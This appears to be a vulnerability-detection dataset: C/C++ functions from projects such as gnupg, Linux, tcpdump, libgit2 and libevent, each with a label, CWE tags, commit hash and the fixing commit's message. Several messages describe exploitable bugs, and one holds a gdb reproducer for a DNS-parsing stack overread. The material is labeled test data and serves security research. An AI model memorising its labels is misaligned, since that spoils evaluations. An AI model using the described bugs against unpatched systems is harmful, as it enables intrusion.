compress_filter( void *opaque, int control, IOBUF a, byte *buf, size_t *ret_len) { size_t size = *ret_len; compress_filter_context_t *zfx = opaque; z_stream *zs = zfx->opaque; int rc=0; if( control == IOBUFCTRL_UNDERFLOW ) { if( !zfx->status ) { zs = zfx->opaque = xmalloc_clear( sizeof *zs ); init_uncompress( zfx, zs ); zfx->status = 1; } zs->next_out = BYTEF_CAST (buf); zs->avail_out = size; zfx->outbufsize = size; /* needed only for calculation */ rc = do_uncompress( zfx, zs, a, ret_len ); } else if( control == IOBUFCTRL_FLUSH ) { if( !zfx->status ) { PACKET pkt; PKT_compressed cd; if(zfx->algo != COMPRESS_ALGO_ZIP && zfx->algo != COMPRESS_ALGO_ZLIB) BUG(); memset( &cd, 0, sizeof cd ); cd.len = 0; cd.algorithm = zfx->algo; init_packet( &pkt ); pkt.pkttype = PKT_COMPRESSED; pkt.pkt.compressed = &cd; if( build_packet( a, &pkt )) log_bug("build_packet(PKT_COMPRESSED) failed\n"); zs = zfx->opaque = xmalloc_clear( sizeof *zs ); init_compress( zfx, zs ); zfx->status = 2; } zs->next_in = BYTEF_CAST (buf); zs->avail_in = size; rc = do_compress( zfx, zs, Z_NO_FLUSH, a ); } else if( control == IOBUFCTRL_FREE ) { if( zfx->status == 1 ) { inflateEnd(zs); xfree(zs); zfx->opaque = NULL; xfree(zfx->outbuf); zfx->outbuf = NULL; } else if( zfx->status == 2 ) { zs->next_in = BYTEF_CAST (buf); zs->avail_in = 0; do_compress( zfx, zs, Z_FINISH, a ); deflateEnd(zs); xfree(zs); zfx->opaque = NULL; xfree(zfx->outbuf); zfx->outbuf = NULL; } if (zfx->release) zfx->release (zfx); } else if( control == IOBUFCTRL_DESC ) *(char**)buf = "compress_filter"; return rc; }
0
[ "CWE-20" ]
gnupg
014b2103fcb12f261135e3954f26e9e07b39e342
261,773,657,730,974,570,000,000,000,000,000,000,000
67
gpg: Avoid infinite loop in uncompressing garbled packets. * g10/compress.c (do_uncompress): Limit the number of extra FF bytes. -- A packet like (a3 01 5b ff) leads to an infinite loop. Using --max-output won't help if it is a partial packet. This patch actually fixes a regression introduced on 1999-05-31 (c34c6769). Actually it would be sufficient to stuff just one extra 0xff byte. Given that this problem popped up only after 15 years, I feel safer to allow for a very few FF bytes. Thanks to Olivier Levillain and Florian Maury for their detailed report.
static int su3000_read_mac_address(struct dvb_usb_device *d, u8 mac[6]) { int i; u8 obuf[] = { 0x1f, 0xf0 }; u8 ibuf[] = { 0 }; struct i2c_msg msg[] = { { .addr = 0x51, .flags = 0, .buf = obuf, .len = 2, }, { .addr = 0x51, .flags = I2C_M_RD, .buf = ibuf, .len = 1, } }; for (i = 0; i < 6; i++) { obuf[1] = 0xf0 + i; if (i2c_transfer(&d->i2c_adap, msg, 2) != 2) break; else mac[i] = ibuf[0]; } return 0; }
0
[ "CWE-476", "CWE-119" ]
linux
606142af57dad981b78707234cfbd15f9f7b7125
152,604,341,697,206,690,000,000,000,000,000,000,000
30
[media] dw2102: don't do DMA on stack On Kernel 4.9, WARNINGs about doing DMA on stack are hit at the dw2102 driver: one in su3000_power_ctrl() and the other in tt_s2_4600_frontend_attach(). Both were due to the use of buffers on the stack as parameters to dvb_usb_generic_rw() and the resulting attempt to do DMA with them. The device was non-functional as a result. So, switch this driver over to use a buffer within the device state structure, as has been done with other DVB-USB drivers. Tested with TechnoTrend TT-connect S2-4600. [[email protected]: fixed a warning at su3000_i2c_transfer() that state var were dereferenced before check 'd'] Signed-off-by: Jonathan McDowell <[email protected]> Cc: <[email protected]> Signed-off-by: Mauro Carvalho Chehab <[email protected]>
static int check_id(X509_STORE_CTX *ctx) { X509_VERIFY_PARAM *vpm = ctx->param; X509_VERIFY_PARAM_ID *id = vpm->id; X509 *x = ctx->cert; if (id->hosts && check_hosts(x, id) <= 0) { if (!check_id_error(ctx, X509_V_ERR_HOSTNAME_MISMATCH)) return 0; } if (id->email && X509_check_email(x, id->email, id->emaillen, 0) <= 0) { if (!check_id_error(ctx, X509_V_ERR_EMAIL_MISMATCH)) return 0; } if (id->ip && X509_check_ip(x, id->ip, id->iplen, 0) <= 0) { if (!check_id_error(ctx, X509_V_ERR_IP_ADDRESS_MISMATCH)) return 0; } return 1; }
0
[]
openssl
a3baa171053547488475709c7197592c66e427cf
133,153,582,274,553,870,000,000,000,000,000,000,000
19
Fix missing ok=0 with locally blacklisted CAs Also in X509_verify_cert() avoid using "i" not only as a loop counter, but also as a trust outcome and as an error ordinal. Finally, make sure that all "goto end" jumps return an error, with "end" renamed to "err" accordingly. [ The 1.1.0 version of X509_verify_cert() is major rewrite, which addresses these issues in a more systemic way. ] Reviewed-by: Rich Salz <[email protected]>
enum_field_types field_type() const { return Type_handler_hybrid_real_field_type::field_type(); }
0
[ "CWE-617" ]
server
2e7891080667c59ac80f788eef4d59d447595772
99,857,564,481,347,330,000,000,000,000,000,000,000
2
MDEV-25635 Assertion failure when pushing from HAVING into WHERE of view This bug could manifest itself after pushing a where condition over a mergeable derived table / view / CTE DT into a grouping view / derived table / CTE V whose item list contained set functions with constant arguments such as MIN(2), SUM(1) etc. In such cases the field references used in the condition pushed into the view V that correspond set functions are wrapped into Item_direct_view_ref wrappers. Due to a wrong implementation of the virtual method const_item() for the class Item_direct_view_ref the wrapped set functions with constant arguments could be erroneously taken for constant items. This could lead to a wrong result set returned by the main select query in 10.2. In 10.4 where a possibility of pushing condition from HAVING into WHERE had been added this could cause a crash. Approved by Sergey Petrunya <[email protected]>
GF_Err tfhd_Size(GF_Box *s) { GF_TrackFragmentHeaderBox *ptr = (GF_TrackFragmentHeaderBox *)s; ptr->size += 4; //The rest depends on the flags if (ptr->flags & GF_ISOM_TRAF_BASE_OFFSET) ptr->size += 8; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_DESC) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_DUR) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_SIZE) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_FLAGS) ptr->size += 4; return GF_OK; }
0
[ "CWE-400", "CWE-401" ]
gpac
d2371b4b204f0a3c0af51ad4e9b491144dd1225c
252,523,142,255,507,150,000,000,000,000,000,000,000
13
prevent dref memleak on invalid input (#1183)
static void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule) { struct nft_expr *expr; /* * Careful: some expressions might not be initialized in case this * is called on error from nf_tables_newrule(). */ expr = nft_expr_first(rule); while (expr->ops && expr != nft_expr_last(rule)) { nf_tables_expr_destroy(ctx, expr); expr = nft_expr_next(expr); } kfree(rule); }
0
[ "CWE-19" ]
nf
a2f18db0c68fec96631c10cad9384c196e9008ac
201,510,627,087,753,970,000,000,000,000,000,000,000
16
netfilter: nf_tables: fix flush ruleset chain dependencies Jumping between chains doesn't mix well with flush ruleset. Rules from a different chain and set elements may still refer to us. [ 353.373791] ------------[ cut here ]------------ [ 353.373845] kernel BUG at net/netfilter/nf_tables_api.c:1159! [ 353.373896] invalid opcode: 0000 [#1] SMP [ 353.373942] Modules linked in: intel_powerclamp uas iwldvm iwlwifi [ 353.374017] CPU: 0 PID: 6445 Comm: 31c3.nft Not tainted 3.18.0 #98 [ 353.374069] Hardware name: LENOVO 5129CTO/5129CTO, BIOS 6QET47WW (1.17 ) 07/14/2010 [...] [ 353.375018] Call Trace: [ 353.375046] [<ffffffff81964c31>] ? nf_tables_commit+0x381/0x540 [ 353.375101] [<ffffffff81949118>] nfnetlink_rcv+0x3d8/0x4b0 [ 353.375150] [<ffffffff81943fc5>] netlink_unicast+0x105/0x1a0 [ 353.375200] [<ffffffff8194438e>] netlink_sendmsg+0x32e/0x790 [ 353.375253] [<ffffffff818f398e>] sock_sendmsg+0x8e/0xc0 [ 353.375300] [<ffffffff818f36b9>] ? move_addr_to_kernel.part.20+0x19/0x70 [ 353.375357] [<ffffffff818f44f9>] ? move_addr_to_kernel+0x19/0x30 [ 353.375410] [<ffffffff819016d2>] ? verify_iovec+0x42/0xd0 [ 353.375459] [<ffffffff818f3e10>] ___sys_sendmsg+0x3f0/0x400 [ 353.375510] [<ffffffff810615fa>] ? native_sched_clock+0x2a/0x90 [ 353.375563] [<ffffffff81176697>] ? acct_account_cputime+0x17/0x20 [ 353.375616] [<ffffffff8110dc78>] ? account_user_time+0x88/0xa0 [ 353.375667] [<ffffffff818f4bbd>] __sys_sendmsg+0x3d/0x80 [ 353.375719] [<ffffffff81b184f4>] ? int_check_syscall_exit_work+0x34/0x3d [ 353.375776] [<ffffffff818f4c0d>] SyS_sendmsg+0xd/0x20 [ 353.375823] [<ffffffff81b1826d>] system_call_fastpath+0x16/0x1b Release objects in this order: rules -> sets -> chains -> tables, to make sure no references to chains are held anymore. Reported-by: Asbjoern Sloth Toennesen <[email protected]> Signed-off-by: Pablo Neira Ayuso <[email protected]>
TEST_P(DownstreamProtocolIntegrationTest, RetryPriority) { const Upstream::HealthyLoad healthy_priority_load({0u, 100u}); const Upstream::DegradedLoad degraded_priority_load({0u, 100u}); NiceMock<Upstream::MockRetryPriority> retry_priority(healthy_priority_load, degraded_priority_load); Upstream::MockRetryPriorityFactory factory(retry_priority); Registry::InjectFactory<Upstream::RetryPriorityFactory> inject_factory(factory); // Add route with custom retry policy auto host = config_helper_.createVirtualHost("host", "/test_retry"); host.set_include_request_attempt_count(true); auto retry_policy = host.mutable_routes(0)->mutable_route()->mutable_retry_policy(); retry_policy->mutable_retry_priority()->set_name(factory.name()); config_helper_.addVirtualHost(host); // Use load assignments instead of static hosts. Necessary in order to use priorities. config_helper_.addConfigModifier([](envoy::config::bootstrap::v2::Bootstrap& bootstrap) { auto cluster = bootstrap.mutable_static_resources()->mutable_clusters(0); auto load_assignment = cluster->mutable_load_assignment(); load_assignment->set_cluster_name(cluster->name()); const auto& host_address = cluster->hosts(0).socket_address().address(); for (int i = 0; i < 2; ++i) { auto locality = load_assignment->add_endpoints(); locality->set_priority(i); locality->mutable_locality()->set_region("region"); locality->mutable_locality()->set_zone("zone"); locality->mutable_locality()->set_sub_zone("sub_zone" + std::to_string(i)); auto lb_endpoint = locality->add_lb_endpoints(); lb_endpoint->mutable_endpoint()->mutable_address()->mutable_socket_address()->set_address( host_address); lb_endpoint->mutable_endpoint()->mutable_address()->mutable_socket_address()->set_port_value( 0); } cluster->clear_hosts(); }); fake_upstreams_count_ = 2; initialize(); codec_client_ = makeHttpConnection(lookupPort("http")); auto response = codec_client_->makeRequestWithBody(Http::TestHeaderMapImpl{{":method", "POST"}, {":path", "/test_retry"}, {":scheme", "http"}, {":authority", "host"}, {"x-forwarded-for", "10.0.0.1"}, {"x-envoy-retry-on", "5xx"}}, 1024); // Note how we're expecting each upstream request to hit the same upstream. waitForNextUpstreamRequest(0); upstream_request_->encodeHeaders(Http::TestHeaderMapImpl{{":status", "503"}}, false); if (fake_upstreams_[0]->httpType() == FakeHttpConnection::Type::HTTP1) { ASSERT_TRUE(fake_upstream_connection_->waitForDisconnect()); ASSERT_TRUE(fake_upstreams_[1]->waitForHttpConnection(*dispatcher_, fake_upstream_connection_)); } else { ASSERT_TRUE(upstream_request_->waitForReset()); } waitForNextUpstreamRequest(1); upstream_request_->encodeHeaders(default_response_headers_, false); upstream_request_->encodeData(512, true); response->waitForEndStream(); EXPECT_TRUE(upstream_request_->complete()); EXPECT_EQ(1024U, upstream_request_->bodyLength()); EXPECT_TRUE(response->complete()); EXPECT_EQ("200", response->headers().Status()->value().getStringView()); EXPECT_EQ(512U, response->body().size()); }
0
[ "CWE-400", "CWE-703" ]
envoy
afc39bea36fd436e54262f150c009e8d72db5014
235,506,016,123,213,600,000,000,000,000,000,000,000
74
Track byteSize of HeaderMap internally. Introduces a cached byte size updated internally in HeaderMap. The value is stored as an optional, and is cleared whenever a non-const pointer or reference to a HeaderEntry is accessed. The cached value can be set with refreshByteSize() which performs an iteration over the HeaderMap to sum the size of each key and value in the HeaderMap. Signed-off-by: Asra Ali <[email protected]>
extern int git_path_is_gitfile(const char *path, size_t pathlen, git_path_gitfile gitfile, git_path_fs fs) { const char *file, *hash; size_t filelen; if (!(gitfile >= GIT_PATH_GITFILE_GITIGNORE && gitfile < ARRAY_SIZE(gitfiles))) { git_error_set(GIT_ERROR_OS, "invalid gitfile for path validation"); return -1; } file = gitfiles[gitfile].file; filelen = gitfiles[gitfile].filelen; hash = gitfiles[gitfile].hash; switch (fs) { case GIT_PATH_FS_GENERIC: return !verify_dotgit_ntfs_generic(path, pathlen, file, filelen, hash) || !verify_dotgit_hfs_generic(path, pathlen, file, filelen); case GIT_PATH_FS_NTFS: return !verify_dotgit_ntfs_generic(path, pathlen, file, filelen, hash); case GIT_PATH_FS_HFS: return !verify_dotgit_hfs_generic(path, pathlen, file, filelen); default: git_error_set(GIT_ERROR_OS, "invalid filesystem for path validation"); return -1; } }
0
[ "CWE-20", "CWE-706" ]
libgit2
3f7851eadca36a99627ad78cbe56a40d3776ed01
173,905,802,721,583,930,000,000,000,000,000,000,000
27
Disallow NTFS Alternate Data Stream attacks, even on Linux/macOS A little-known feature of NTFS is that it offers to store metadata in so-called "Alternate Data Streams" (inspired by Apple's "resource forks") that are copied together with the file they are associated with. These Alternate Data Streams can be accessed via `<file name>:<stream name>:<stream type>`. Directories, too, have Alternate Data Streams, and they even have a default stream type `$INDEX_ALLOCATION`. Which means that `abc/` and `abc::$INDEX_ALLOCATION/` are actually equivalent. This is of course another attack vector on the Git directory that we definitely want to prevent. On Windows, we already do this incidentally, by disallowing colons in file/directory names. While it looks as if files'/directories' Alternate Data Streams are not accessible in the Windows Subsystem for Linux, and neither via CIFS/SMB-mounted network shares in Linux, it _is_ possible to access them on SMB-mounted network shares on macOS. Therefore, let's go the extra mile and prevent this particular attack _everywhere_. To keep things simple, let's just disallow *any* Alternate Data Stream of `.git`. This is libgit2's variant of CVE-2019-1352. Signed-off-by: Johannes Schindelin <[email protected]>
rfc1048_print(netdissect_options *ndo, register const u_char *bp) { register uint16_t tag; register u_int len; register const char *cp; register char c; int first, idx; uint32_t ul; uint16_t us; uint8_t uc, subopt, suboptlen; ND_PRINT((ndo, "\n\t Vendor-rfc1048 Extensions")); /* Step over magic cookie */ ND_PRINT((ndo, "\n\t Magic Cookie 0x%08x", EXTRACT_32BITS(bp))); bp += sizeof(int32_t); /* Loop while we there is a tag left in the buffer */ while (ND_TTEST2(*bp, 1)) { tag = *bp++; if (tag == TAG_PAD && ndo->ndo_vflag < 3) continue; if (tag == TAG_END && ndo->ndo_vflag < 3) return; if (tag == TAG_EXTENDED_OPTION) { ND_TCHECK2(*(bp + 1), 2); tag = EXTRACT_16BITS(bp + 1); /* XXX we don't know yet if the IANA will * preclude overlap of 1-byte and 2-byte spaces. * If not, we need to offset tag after this step. */ cp = tok2str(xtag2str, "?xT%u", tag); } else cp = tok2str(tag2str, "?T%u", tag); c = *cp++; if (tag == TAG_PAD || tag == TAG_END) len = 0; else { /* Get the length; check for truncation */ ND_TCHECK2(*bp, 1); len = *bp++; } ND_PRINT((ndo, "\n\t %s Option %u, length %u%s", cp, tag, len, len > 0 ? ": " : "")); if (tag == TAG_PAD && ndo->ndo_vflag > 2) { u_int ntag = 1; while (ND_TTEST2(*bp, 1) && *bp == TAG_PAD) { bp++; ntag++; } if (ntag > 1) ND_PRINT((ndo, ", occurs %u", ntag)); } if (!ND_TTEST2(*bp, len)) { ND_PRINT((ndo, "[|rfc1048 %u]", len)); return; } if (tag == TAG_DHCP_MESSAGE && len == 1) { uc = *bp++; ND_PRINT((ndo, "%s", tok2str(dhcp_msg_values, "Unknown (%u)", uc))); continue; } if (tag == TAG_PARM_REQUEST) { idx = 0; while (len-- > 0) { uc = *bp++; cp = tok2str(tag2str, "?Option %u", uc); if (idx % 4 == 0) ND_PRINT((ndo, "\n\t ")); else ND_PRINT((ndo, ", ")); ND_PRINT((ndo, "%s", cp + 1)); idx++; } continue; } if (tag == TAG_EXTENDED_REQUEST) { first = 1; while (len > 1) { len -= 2; us = EXTRACT_16BITS(bp); bp += 2; cp = tok2str(xtag2str, "?xT%u", us); if (!first) ND_PRINT((ndo, "+")); ND_PRINT((ndo, "%s", cp + 1)); first = 0; } continue; } /* Print data */ if (c == '?') { /* Base default formats for unknown tags on data size */ if (len & 1) c = 'b'; else if (len & 2) c = 's'; else c = 'l'; } first = 1; switch (c) { case 'a': /* ASCII strings */ ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len; len = 0; break; case 'i': case 'l': case 'L': /* ip addresses/32-bit words */ while (len >= sizeof(ul)) { if (!first) ND_PRINT((ndo, ",")); ul = EXTRACT_32BITS(bp); if (c == 'i') { ul = htonl(ul); ND_PRINT((ndo, "%s", ipaddr_string(ndo, &ul))); } else if (c == 'L') ND_PRINT((ndo, "%d", ul)); else ND_PRINT((ndo, "%u", ul)); bp += sizeof(ul); len -= sizeof(ul); first = 0; } break; case 'p': /* IP address pairs */ while (len >= 2*sizeof(ul)) { if (!first) ND_PRINT((ndo, ",")); memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, "(%s:", ipaddr_string(ndo, &ul))); bp += sizeof(ul); memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, "%s)", ipaddr_string(ndo, &ul))); bp += sizeof(ul); len -= 2*sizeof(ul); first = 0; } break; case 's': /* shorts */ while (len >= sizeof(us)) { if (!first) ND_PRINT((ndo, ",")); us = EXTRACT_16BITS(bp); ND_PRINT((ndo, "%u", us)); bp += sizeof(us); len -= sizeof(us); first = 0; } break; case 'B': /* boolean */ while (len > 0) { if (!first) ND_PRINT((ndo, ",")); switch (*bp) { case 0: ND_PRINT((ndo, "N")); break; case 1: ND_PRINT((ndo, "Y")); break; default: ND_PRINT((ndo, "%u?", *bp)); break; } ++bp; --len; first = 0; } break; case 'b': case 'x': default: /* Bytes */ while (len > 0) { if (!first) ND_PRINT((ndo, c == 'x' ? ":" : ".")); if (c == 'x') ND_PRINT((ndo, "%02x", *bp)); else ND_PRINT((ndo, "%u", *bp)); ++bp; --len; first = 0; } break; case '$': /* Guys we can't handle with one of the usual cases */ switch (tag) { case TAG_NETBIOS_NODE: /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } tag = *bp++; --len; ND_PRINT((ndo, "%s", tok2str(nbo2str, NULL, tag))); break; case TAG_OPT_OVERLOAD: /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } tag = *bp++; --len; ND_PRINT((ndo, "%s", tok2str(oo2str, NULL, tag))); break; case TAG_CLIENT_FQDN: /* this option should be at least 3 bytes long */ if (len < 3) { ND_PRINT((ndo, "ERROR: length < 3 bytes")); bp += len; len = 0; break; } if (*bp) ND_PRINT((ndo, "[%s] ", client_fqdn_flags(*bp))); bp++; if (*bp || *(bp+1)) ND_PRINT((ndo, "%u/%u ", *bp, *(bp+1))); bp += 2; ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len - 3, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len - 3; len = 0; break; case TAG_CLIENT_ID: { int type; /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } type = *bp++; len--; if (type == 0) { ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len; len = 0; break; } else { ND_PRINT((ndo, "%s ", tok2str(arp2str, "hardware-type %u,", type))); while (len > 0) { if (!first) ND_PRINT((ndo, ":")); ND_PRINT((ndo, "%02x", *bp)); ++bp; --len; first = 0; } } break; } case TAG_AGENT_CIRCUIT: while (len >= 2) { subopt = *bp++; suboptlen = *bp++; len -= 2; if (suboptlen > len) { ND_PRINT((ndo, "\n\t %s SubOption %u, length %u: length goes past end of option", tok2str(agent_suboption_values, "Unknown", subopt), subopt, suboptlen)); bp += len; len = 0; break; } ND_PRINT((ndo, "\n\t %s SubOption %u, length %u: ", tok2str(agent_suboption_values, "Unknown", subopt), subopt, suboptlen)); switch (subopt) { case AGENT_SUBOPTION_CIRCUIT_ID: /* fall through */ case AGENT_SUBOPTION_REMOTE_ID: case AGENT_SUBOPTION_SUBSCRIBER_ID: if (fn_printn(ndo, bp, suboptlen, ndo->ndo_snapend)) goto trunc; break; default: print_unknown_data(ndo, bp, "\n\t\t", suboptlen); } len -= suboptlen; bp += suboptlen; } break; case TAG_CLASSLESS_STATIC_RT: case TAG_CLASSLESS_STA_RT_MS: { u_int mask_width, significant_octets, i; /* this option should be at least 5 bytes long */ if (len < 5) { ND_PRINT((ndo, "ERROR: length < 5 bytes")); bp += len; len = 0; break; } while (len > 0) { if (!first) ND_PRINT((ndo, ",")); mask_width = *bp++; len--; /* mask_width <= 32 */ if (mask_width > 32) { ND_PRINT((ndo, "[ERROR: Mask width (%d) > 32]", mask_width)); bp += len; len = 0; break; } significant_octets = (mask_width + 7) / 8; /* significant octets + router(4) */ if (len < significant_octets + 4) { ND_PRINT((ndo, "[ERROR: Remaining length (%u) < %u bytes]", len, significant_octets + 4)); bp += len; len = 0; break; } ND_PRINT((ndo, "(")); if (mask_width == 0) ND_PRINT((ndo, "default")); else { for (i = 0; i < significant_octets ; i++) { if (i > 0) ND_PRINT((ndo, ".")); ND_PRINT((ndo, "%d", *bp++)); } for (i = significant_octets ; i < 4 ; i++) ND_PRINT((ndo, ".0")); ND_PRINT((ndo, "/%d", mask_width)); } memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, ":%s)", ipaddr_string(ndo, &ul))); bp += sizeof(ul); len -= (significant_octets + 4); first = 0; } break; } case TAG_USER_CLASS: { u_int suboptnumber = 1; first = 1; if (len < 2) { ND_PRINT((ndo, "ERROR: length < 2 bytes")); bp += len; len = 0; break; } while (len > 0) { suboptlen = *bp++; len--; ND_PRINT((ndo, "\n\t ")); ND_PRINT((ndo, "instance#%u: ", suboptnumber)); if (suboptlen == 0) { ND_PRINT((ndo, "ERROR: suboption length must be non-zero")); bp += len; len = 0; break; } if (len < suboptlen) { ND_PRINT((ndo, "ERROR: invalid option")); bp += len; len = 0; break; } ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, suboptlen, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); ND_PRINT((ndo, ", length %d", suboptlen)); suboptnumber++; len -= suboptlen; bp += suboptlen; } break; } default: ND_PRINT((ndo, "[unknown special tag %u, size %u]", tag, len)); bp += len; len = 0; break; } break; } /* Data left over? */ if (len) { ND_PRINT((ndo, "\n\t trailing data length %u", len)); bp += len; } } return; trunc: ND_PRINT((ndo, "|[rfc1048]")); }
0
[ "CWE-125" ]
tcpdump
29e5470e6ab84badbc31f4532bb7554a796d9d52
116,069,581,579,762,630,000,000,000,000,000,000,000
449
CVE-2017-13028/BOOTP: Add a bounds check before fetching data This fixes a buffer over-read discovered by Bhargava Shastry, SecT/TU Berlin. Add a test using the capture file supplied by the reporter(s), modified so the capture file won't cause 'tcpdump: pcap_loop: truncated dump file'
blobGetFilename(const blob *b) { assert(b != NULL); #ifdef CL_DEBUG assert(b->magic == BLOBCLASS); #endif return b->name; }
0
[ "CWE-476" ]
clamav-devel
8bb3716be9c7ab7c6a3a1889267b1072f48af87b
320,533,741,338,123,300,000,000,000,000,000,000,000
9
fuzz-22348 null deref in egg utf8 conversion Corrected memory leaks and a null dereference in the egg utf8 conversion.
WritingTask (TaskGroup *group, MultiPartOutputFile* file, vector<WritingTaskData*> data, Array2D<FrameBuffer>* tiledFrameBuffers): Task(group), file(file), data(data), tiledFrameBuffers(tiledFrameBuffers) {}
0
[ "CWE-125" ]
openexr
e79d2296496a50826a15c667bf92bdc5a05518b4
135,807,216,463,724,700,000,000,000,000,000,000,000
7
fix memory leaks and invalid memory accesses Signed-off-by: Peter Hillman <[email protected]>
PJ_DEF(void) pjsua_media_config_default(pjsua_media_config *cfg) { const pj_sys_info *si = pj_get_sys_info(); pj_str_t dev_model = {"iPhone5", 7}; pj_bzero(cfg, sizeof(*cfg)); cfg->clock_rate = PJSUA_DEFAULT_CLOCK_RATE; /* It is reported that there may be some media server resampling problem * with iPhone 5 devices running iOS 7, so we set the sound device's * clock rate to 44100 to avoid resampling. */ if (pj_stristr(&si->machine, &dev_model) && ((si->os_ver & 0xFF000000) >> 24) >= 7) { cfg->snd_clock_rate = 44100; } else { cfg->snd_clock_rate = 0; } cfg->channel_count = 1; cfg->audio_frame_ptime = PJSUA_DEFAULT_AUDIO_FRAME_PTIME; cfg->max_media_ports = PJSUA_MAX_CONF_PORTS; cfg->has_ioqueue = PJ_TRUE; cfg->thread_cnt = 1; cfg->quality = PJSUA_DEFAULT_CODEC_QUALITY; cfg->ilbc_mode = PJSUA_DEFAULT_ILBC_MODE; cfg->ec_tail_len = PJSUA_DEFAULT_EC_TAIL_LEN; cfg->snd_rec_latency = PJMEDIA_SND_DEFAULT_REC_LATENCY; cfg->snd_play_latency = PJMEDIA_SND_DEFAULT_PLAY_LATENCY; cfg->jb_init = cfg->jb_min_pre = cfg->jb_max_pre = cfg->jb_max = -1; cfg->jb_discard_algo = PJMEDIA_JB_DISCARD_PROGRESSIVE; cfg->snd_auto_close_time = 1; cfg->ice_max_host_cands = -1; cfg->ice_always_update = PJ_TRUE; pj_ice_sess_options_default(&cfg->ice_opt); cfg->turn_conn_type = PJ_TURN_TP_UDP; #if PJ_HAS_SSL_SOCK pj_turn_sock_tls_cfg_default(&cfg->turn_tls_setting); #endif cfg->vid_preview_enable_native = PJ_TRUE; }
0
[ "CWE-120", "CWE-787" ]
pjproject
d27f79da11df7bc8bb56c2f291d71e54df8d2c47
47,596,734,285,039,530,000,000,000,000,000,000,000
43
Use PJ_ASSERT_RETURN() on pjsip_auth_create_digest() and pjsua_init_tpselector() (#3009) * Use PJ_ASSERT_RETURN on pjsip_auth_create_digest * Use PJ_ASSERT_RETURN on pjsua_init_tpselector() * Fix incorrect check. * Add return value to pjsip_auth_create_digest() and pjsip_auth_create_digestSHA256() * Modification based on comments.
server_port_read(struct evdns_server_port *s) { u8 packet[1500]; struct sockaddr_storage addr; ev_socklen_t addrlen; int r; ASSERT_LOCKED(s); for (;;) { addrlen = sizeof(struct sockaddr_storage); r = recvfrom(s->socket, (void*)packet, sizeof(packet), 0, (struct sockaddr*) &addr, &addrlen); if (r < 0) { int err = evutil_socket_geterror(s->socket); if (EVUTIL_ERR_RW_RETRIABLE(err)) return; log(EVDNS_LOG_WARN, "Error %s (%d) while reading request.", evutil_socket_error_to_string(err), err); return; } request_parse(packet, r, s, (struct sockaddr*) &addr, addrlen); } }
0
[ "CWE-125" ]
libevent
96f64a022014a208105ead6c8a7066018449d86d
38,768,749,988,075,110,000,000,000,000,000,000,000
23
evdns: name_parse(): fix remote stack overread @asn-the-goblin-slayer: "the name_parse() function in libevent's DNS code is vulnerable to a buffer overread. 971 if (cp != name_out) { 972 if (cp + 1 >= end) return -1; 973 *cp++ = '.'; 974 } 975 if (cp + label_len >= end) return -1; 976 memcpy(cp, packet + j, label_len); 977 cp += label_len; 978 j += label_len; No check is made against length before the memcpy occurs. This was found through the Tor bug bounty program and the discovery should be credited to 'Guido Vranken'." Reproducer for gdb (https://gist.github.com/azat/e4fcf540e9b89ab86d02): set $PROT_NONE=0x0 set $PROT_READ=0x1 set $PROT_WRITE=0x2 set $MAP_ANONYMOUS=0x20 set $MAP_SHARED=0x01 set $MAP_FIXED=0x10 set $MAP_32BIT=0x40 start set $length=202 # overread set $length=2 # allocate with mmap to have a seg fault on page boundary set $l=(1<<20)*2 p mmap(0, $l, $PROT_READ|$PROT_WRITE, $MAP_ANONYMOUS|$MAP_SHARED|$MAP_32BIT, -1, 0) set $packet=(char *)$1+$l-$length # hack the packet set $packet[0]=63 set $packet[1]='/' p malloc(sizeof(int)) set $idx=(int *)$2 set $idx[0]=0 set $name_out_len=202 p malloc($name_out_len) set $name_out=$3 # have WRITE only mapping to fail on read set $end=$1+$l p (void *)mmap($end, 1<<12, $PROT_NONE, $MAP_ANONYMOUS|$MAP_SHARED|$MAP_FIXED|$MAP_32BIT, -1, 0) set $m=$4 p name_parse($packet, $length, $idx, $name_out, $name_out_len) x/2s (char *)$name_out Before this patch: $ gdb -ex 'source gdb' dns-example $1 = 1073741824 $2 = (void *) 0x633010 $3 = (void *) 0x633030 $4 = (void *) 0x40200000 Program received signal SIGSEGV, Segmentation fault. __memcpy_sse2_unaligned () at memcpy-sse2-unaligned.S:33 After this patch: $ gdb -ex 'source gdb' dns-example $1 = 1073741824 $2 = (void *) 0x633010 $3 = (void *) 0x633030 $4 = (void *) 0x40200000 $5 = -1 0x633030: "/" 0x633032: "" (gdb) p $m $6 = (void *) 0x40200000 (gdb) p $1 $7 = 1073741824 (gdb) p/x $1 $8 = 0x40000000 (gdb) quit P.S. plus drop one condition duplicate. Fixes: #317
int __xfrm_decode_session(struct sk_buff *skb, struct flowi *fl, unsigned int family, int reverse) { const struct xfrm_policy_afinfo *afinfo = xfrm_policy_get_afinfo(family); int err; if (unlikely(afinfo == NULL)) return -EAFNOSUPPORT; afinfo->decode_session(skb, fl, reverse); err = security_xfrm_decode_session(skb, &fl->flowi_secid); rcu_read_unlock(); return err; }
0
[ "CWE-125" ]
ipsec
7bab09631c2a303f87a7eb7e3d69e888673b9b7e
259,805,604,217,518,370,000,000,000,000,000,000,000
14
